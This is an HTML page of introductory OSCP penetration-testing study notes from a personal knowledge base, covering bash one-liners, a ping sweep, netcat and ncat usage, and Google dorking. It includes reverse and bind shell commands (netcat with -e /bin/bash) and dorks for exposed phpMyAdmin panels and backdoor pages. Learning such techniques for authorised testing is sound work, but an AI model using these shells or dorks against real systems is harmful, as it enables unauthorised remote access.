


<!doctype html>
<html lang="en" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
        <meta name="description" content="Wissenverzeichnis zu diversen Dingen der Computerei">
      
      
      
        <meta name="author" content="Felix Körner">
      
      <link rel="shortcut icon" href="../assets/images/favicon.png">
      <meta name="generator" content="mkdocs-1.1.2, mkdocs-material-5.3.3">
    
    
      
        <title>OSCP - KnowledgeBase</title>
      
    
    
      <link rel="stylesheet" href="../assets/stylesheets/main.fe0cca5b.min.css">
      
        <link rel="stylesheet" href="../assets/stylesheets/palette.a46bcfb3.min.css">
      
      
        
        
        <meta name="theme-color" content="#2196f3">
      
    
    
    
      
        <link href="https://fonts.gstatic.com" rel="preconnect" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,400,400i,700%7CRoboto+Mono&display=fallback">
        <style>body,input{font-family:"Roboto",-apple-system,BlinkMacSystemFont,Helvetica,Arial,sans-serif}code,kbd,pre{font-family:"Roboto Mono",SFMono-Regular,Consolas,Menlo,monospace}</style>
      
    
    
    
    
      
    
    
  </head>
  
  
    
    
    
    <body dir="ltr" data-md-color-scheme="" data-md-color-primary="blue" data-md-color-accent="cyan">
  
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
        
        <a href="#oscp" class="md-skip">
          Skip to content
        </a>
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
      <header class="md-header" data-md-component="header">
  <nav class="md-header-nav md-grid" aria-label="Header">
    <a href=".." title="KnowledgeBase" class="md-header-nav__button md-logo" aria-label="KnowledgeBase">
      
  <img src="../images/logo2.png" alt="logo">

    </a>
    <label class="md-header-nav__button md-icon" for="__drawer">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3V6m0 5h18v2H3v-2m0 5h18v2H3v-2z"/></svg>
    </label>
    <div class="md-header-nav__title" data-md-component="header-title">
      
        <div class="md-header-nav__ellipsis">
          <span class="md-header-nav__topic md-ellipsis">
            KnowledgeBase
          </span>
          <span class="md-header-nav__topic md-ellipsis">
            
              OSCP
            
          </span>
        </div>
      
    </div>
    
      <label class="md-header-nav__button md-icon" for="__search">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0116 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 019.5 16 6.5 6.5 0 013 9.5 6.5 6.5 0 019.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5z"/></svg>
      </label>
      
<div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" data-md-state="active">
      <label class="md-search__icon md-icon" for="__search">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0116 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 019.5 16 6.5 6.5 0 013 9.5 6.5 6.5 0 019.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5z"/></svg>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12z"/></svg>
      </label>
      <button type="reset" class="md-search__icon md-icon" aria-label="Clear" data-md-component="search-reset" tabindex="-1">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41L17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12 19 6.41z"/></svg>
      </button>
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" data-md-scrollfix>
        <div class="md-search-result" data-md-component="search-result">
          <div class="md-search-result__meta">
            Initializing search
          </div>
          <ol class="md-search-result__list"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
    
    
  </nav>
</header>
    
    <div class="md-container" data-md-component="container">
      
        
      
      
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              <div class="md-sidebar md-sidebar--primary" data-md-component="navigation">
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    <nav class="md-nav md-nav--primary" aria-label="Navigation" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href=".." title="KnowledgeBase" class="md-nav__button md-logo" aria-label="KnowledgeBase">
      
  <img src="../images/logo2.png" alt="logo">

    </a>
    KnowledgeBase
  </label>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
      


  <li class="md-nav__item">
    <a href=".." title="Home" class="md-nav__link">
      Home
    </a>
  </li>

    
      
      
      

  


  <li class="md-nav__item md-nav__item--active md-nav__item--nested">
    
      <input class="md-nav__toggle md-toggle" data-md-toggle="nav-2" type="checkbox" id="nav-2" checked>
    
    <label class="md-nav__link" for="nav-2">
      IT Security
      <span class="md-nav__icon md-icon">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M8.59 16.58L13.17 12 8.59 7.41 10 6l6 6-6 6-1.41-1.42z"/></svg>
      </span>
    </label>
    <nav class="md-nav" aria-label="IT Security" data-md-level="1">
      <label class="md-nav__title" for="nav-2">
        <span class="md-nav__icon md-icon">
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12z"/></svg>
        </span>
        IT Security
      </label>
      <ul class="md-nav__list" data-md-scrollfix>
        
        
          
          
          


  <li class="md-nav__item">
    <a href="../hacking/" title="Hacking the art of exploitation" class="md-nav__link">
      Hacking the art of exploitation
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../Protostar/" title="Protostar" class="md-nav__link">
      Protostar
    </a>
  </li>

        
          
          
          

  


  <li class="md-nav__item md-nav__item--active">
    
    <input class="md-nav__toggle md-toggle" data-md-toggle="toc" type="checkbox" id="__toc">
    
      
    
    
      <label class="md-nav__link md-nav__link--active" for="__toc">
        OSCP
        <span class="md-nav__icon md-icon">
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 9h14V7H3v2m0 4h14v-2H3v2m0 4h14v-2H3v2m16 0h2v-2h-2v2m0-10v2h2V7h-2m0 6h2v-2h-2v2z"/></svg>
        </span>
      </label>
    
    <a href="./" title="OSCP" class="md-nav__link md-nav__link--active">
      OSCP
    </a>
    
      
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12z"/></svg>
      </span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#tools" class="md-nav__link">
    Tools
  </a>
  
    <nav class="md-nav" aria-label="Tools">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#bash" class="md-nav__link">
    Bash
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#netcat" class="md-nav__link">
    Netcat
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#ncat" class="md-nav__link">
    Ncat
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#wireshark" class="md-nav__link">
    Wireshark
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#tcpdump" class="md-nav__link">
    Tcpdump
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#information-gathering" class="md-nav__link">
    Information Gathering
  </a>
  
    <nav class="md-nav" aria-label="Information Gathering">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#active" class="md-nav__link">
    Active
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#passive" class="md-nav__link">
    Passive
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
    </ul>
  
</nav>
    
  </li>

        
      </ul>
    </nav>
  </li>

    
      
      
      


  <li class="md-nav__item md-nav__item--nested">
    
      <input class="md-nav__toggle md-toggle" data-md-toggle="nav-3" type="checkbox" id="nav-3">
    
    <label class="md-nav__link" for="nav-3">
      Linux
      <span class="md-nav__icon md-icon">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M8.59 16.58L13.17 12 8.59 7.41 10 6l6 6-6 6-1.41-1.42z"/></svg>
      </span>
    </label>
    <nav class="md-nav" aria-label="Linux" data-md-level="1">
      <label class="md-nav__title" for="nav-3">
        <span class="md-nav__icon md-icon">
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12z"/></svg>
        </span>
        Linux
      </label>
      <ul class="md-nav__list" data-md-scrollfix>
        
        
          
          
          


  <li class="md-nav__item">
    <a href="../p2p_network/" title="P2P Network" class="md-nav__link">
      P2P Network
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../raid/" title="RAID Debian" class="md-nav__link">
      RAID Debian
    </a>
  </li>

        
      </ul>
    </nav>
  </li>

    
      
      
      


  <li class="md-nav__item md-nav__item--nested">
    
      <input class="md-nav__toggle md-toggle" data-md-toggle="nav-4" type="checkbox" id="nav-4">
    
    <label class="md-nav__link" for="nav-4">
      Test
      <span class="md-nav__icon md-icon">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M8.59 16.58L13.17 12 8.59 7.41 10 6l6 6-6 6-1.41-1.42z"/></svg>
      </span>
    </label>
    <nav class="md-nav" aria-label="Test" data-md-level="1">
      <label class="md-nav__title" for="nav-4">
        <span class="md-nav__icon md-icon">
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12z"/></svg>
        </span>
        Test
      </label>
      <ul class="md-nav__list" data-md-scrollfix>
        
        
          
          
          


  <li class="md-nav__item">
    <a href="../jd/" title="JDownloader 2.0" class="md-nav__link">
      JDownloader 2.0
    </a>
  </li>

        
      </ul>
    </nav>
  </li>

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
              <div class="md-sidebar md-sidebar--secondary" data-md-component="toc">
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12z"/></svg>
      </span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#tools" class="md-nav__link">
    Tools
  </a>
  
    <nav class="md-nav" aria-label="Tools">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#bash" class="md-nav__link">
    Bash
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#netcat" class="md-nav__link">
    Netcat
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#ncat" class="md-nav__link">
    Ncat
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#wireshark" class="md-nav__link">
    Wireshark
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#tcpdump" class="md-nav__link">
    Tcpdump
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#information-gathering" class="md-nav__link">
    Information Gathering
  </a>
  
    <nav class="md-nav" aria-label="Information Gathering">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#active" class="md-nav__link">
    Active
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#passive" class="md-nav__link">
    Passive
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
    </ul>
  
</nav>
                  </div>
                </div>
              </div>
            
          
          <div class="md-content">
            <article class="md-content__inner md-typeset">
              
                
                
                  
                
                
                <h1 id="oscp">OSCP<a class="headerlink" href="#oscp" title="Permanent link">&para;</a></h1>
<h2 id="tools">Tools<a class="headerlink" href="#tools" title="Permanent link">&para;</a></h2>
<h4 id="bash">Bash<a class="headerlink" href="#bash" title="Permanent link">&para;</a></h4>
<p>The task is to get all urls on the page www.cisco.com</p>
<ul>
<li>content of the page can be downloaded with <br />
<code>wget www.cisco.com</code></li>
<li>one line of the file <code>index.html</code> looks like that<br />
<code>&lt;li&gt;&lt;a,href="http://newsroom.cisco.com/"&gt;Newsroom&lt;/a&gt;&lt;/li&gt;</code></li>
<li>we can use a one liner to solve the task    <ul>
<li><code>grep</code> searches for given string  </li>
<li><code>cut</code> gets a delimiter with <code>-d</code> and returns the field <code>-f</code></li>
<li><code>sort -u</code> shows only unique strings  </li>
</ul>
</li>
</ul>
<table class="codehilitetable"><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="codehilite"><pre><span></span><code><span class="err">grep &quot;href=&quot; index.html | cut -d &quot;/&quot; -f 3 | grep &quot;\.&quot; | cut -d &#39;&quot;&#39; -f 1 | sort -u</span>
</code></pre></div>
</td></tr></table>

<p>loop over the input of a file line by line</p>
<table class="codehilitetable"><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="codehilite"><pre><span></span><code><span class="err">for url in $(cat list.txt); do host $url; done</span>
</code></pre></div>
</td></tr></table>

<p>Ping Sweep</p>
<table class="codehilitetable"><tr><td class="linenos"><div class="linenodiv"><pre>1
2
3
4
5
6
7
8</pre></div></td><td class="code"><div class="codehilite"><pre><span></span><code><span class="ch">#!/bin/bash</span>

<span class="nb">echo</span> <span class="s2">&quot;Ping Sweep&quot;</span>

<span class="k">for</span> ip in <span class="o">{</span><span class="m">0</span>..254<span class="o">}</span>
<span class="k">do</span>
        ping -c1 <span class="m">192</span>.168.178.<span class="nv">$ip</span><span class="p">|</span> grep <span class="s2">&quot;bytes from&quot;</span><span class="p">|</span>cut -d <span class="s2">&quot; &quot;</span> -f4<span class="p">|</span>cut -d <span class="s2">&quot;:&quot;</span> -f1 <span class="p">&amp;</span>
<span class="k">done</span>
</code></pre></div>
</td></tr></table>

<div class="admonition info">
<p class="admonition-title">Info</p>
<ul>
<li>Bind Shell: Server is listening</li>
<li>Reverse Shell: Client is listening</li>
</ul>
</div>
<h3 id="netcat">Netcat<a class="headerlink" href="#netcat" title="Permanent link">&para;</a></h3>
<ul>
<li>
<p>Switches used</p>
<ul>
<li><code>-l</code> listen for connection</li>
<li><code>-n</code> Do not do any DNS or service lookups</li>
<li><code>-v</code> verbose</li>
<li><code>-p</code> source port</li>
</ul>
</li>
<li>
<p>Chat</p>
<ul>
<li>Client: <code>nc -nv &lt;server ip addr&gt; &lt;open port on server&gt;</code></li>
<li>Sever: <code>nc -nlvp &lt;listening port&gt;</code></li>
</ul>
</li>
<li>
<p>File transfer</p>
<ul>
<li>Client: <code>nc -nv &lt;server ip addr&gt; 4444 &lt; sending.exe</code></li>
<li>Sever: <code>nc -nlvp 4444 &gt; incoming.exe</code></li>
</ul>
</li>
<li>
<p>Bind Shell</p>
<ul>
<li>Client: <code>nc -vn &lt;server ip addr&gt; 4444</code></li>
<li>Server: <code>nc -nlvp 4444 -c &lt;path to shell&gt;</code></li>
</ul>
</li>
<li>
<p>Reverse Shell</p>
<ul>
<li>Server has no public ip</li>
<li>Client: <code>nc -nlvp 4444</code></li>
<li>Server: <code>nc -vn &lt;client ip addr&gt; 4444 -e /bin/bash</code></li>
</ul>
</li>
</ul>
<h3 id="ncat">Ncat<a class="headerlink" href="#ncat" title="Permanent link">&para;</a></h3>
<ul>
<li>
<p>improved <strong>Netcat</strong> adds:</p>
<ul>
<li>encryption</li>
<li>access limitation</li>
</ul>
</li>
<li>
<p>Bind Shell</p>
<ul>
<li>Client <code>ncat -v &lt;server ip addr&gt; &lt;open port on server&gt;</code></li>
<li>Server <code>ncat -lvp &lt;listening port&gt; -e &lt;path to shell&gt; --allow &lt;client ip addr&gt; --ssl</code></li>
</ul>
</li>
</ul>
<h3 id="wireshark">Wireshark<a class="headerlink" href="#wireshark" title="Permanent link">&para;</a></h3>
<ul>
<li>Follow TCP Stream</li>
</ul>
<h3 id="tcpdump">Tcpdump<a class="headerlink" href="#tcpdump" title="Permanent link">&para;</a></h3>
<h2 id="information-gathering">Information Gathering<a class="headerlink" href="#information-gathering" title="Permanent link">&para;</a></h2>
<h3 id="active">Active<a class="headerlink" href="#active" title="Permanent link">&para;</a></h3>
<h3 id="passive">Passive<a class="headerlink" href="#passive" title="Permanent link">&para;</a></h3>
<ul>
<li>Google Hacking<ul>
<li><code>site:"&lt;url of website&gt;"</code><ul>
<li>gets all subdomains</li>
<li>size of webpresenz</li>
</ul>
</li>
<li><code>-site:"&lt;url of website&gt;"</code><ul>
<li>exclude these</li>
</ul>
</li>
<li><code>filetype:&lt;file extesion&gt;</code><ul>
<li>ex.: ppt, pdf, txt</li>
</ul>
</li>
<li><code>"&lt;search string&gt;"</code> search the exact string</li>
<li><code>intitle:"&lt;string&gt;"</code></li>
<li><code>inurl:"&lt;/path/for/search&gt;"</code></li>
<li><code>inurl:.php? intext:CHARACTER_SETS,COLLATIONS intitle:phpmyadmin</code><ul>
<li>searching for unprotected phpmyadmin panels</li>
</ul>
</li>
<li><code>intitle:"-N3t" filetype:php undetectable</code><ul>
<li>searching after string found in backdoor</li>
</ul>
</li>
<li><a href="https://www.exploit-db.com/google-hacking-database">Google Hacking Database</a></li>
</ul>
</li>
</ul>
                
              
              
                


              
            </article>
          </div>
        </div>
      </main>
      
        
<footer class="md-footer">
  
    <div class="md-footer-nav">
      <nav class="md-footer-nav__inner md-grid" aria-label="Footer">
        
          <a href="../Protostar/" title="Protostar" class="md-footer-nav__link md-footer-nav__link--prev" rel="prev">
            <div class="md-footer-nav__button md-icon">
              <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12z"/></svg>
            </div>
            <div class="md-footer-nav__title">
              <div class="md-ellipsis">
                <span class="md-footer-nav__direction">
                  Previous
                </span>
                Protostar
              </div>
            </div>
          </a>
        
        
          <a href="../p2p_network/" title="P2P Network" class="md-footer-nav__link md-footer-nav__link--next" rel="next">
            <div class="md-footer-nav__title">
              <div class="md-ellipsis">
                <span class="md-footer-nav__direction">
                  Next
                </span>
                P2P Network
              </div>
            </div>
            <div class="md-footer-nav__button md-icon">
              <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M4 11v2h12l-5.5 5.5 1.42 1.42L19.84 12l-7.92-7.92L10.5 5.5 16 11H4z"/></svg>
            </div>
          </a>
        
      </nav>
    </div>
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-footer-copyright">
        
          <div class="md-footer-copyright__highlight">
            Copyright &copy; Felix Körner under CC BY-SA 3.0 DE
          </div>
        
        Made with
        <a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
          Material for MkDocs
        </a>
      </div>
      
    </div>
  </div>
</footer>
      
    </div>
    
      <script src="../assets/javascripts/vendor.d710d30a.min.js"></script>
      <script src="../assets/javascripts/bundle.4a5ba8d6.min.js"></script><script id="__lang" type="application/json">{"clipboard.copy": "Copy to clipboard", "clipboard.copied": "Copied to clipboard", "search.config.lang": "en", "search.config.pipeline": "trimmer, stopWordFilter", "search.config.separator": "[\\s\\-]+", "search.result.placeholder": "Type to start searching", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents"}</script>
      
      <script>
        app = initialize({
          base: "..",
          features: [],
          search: Object.assign({
            worker: "../assets/javascripts/worker/search.9b3611bd.min.js"
          }, typeof search !== "undefined" && search)
        })
      </script>
      
    
  </body>
</html>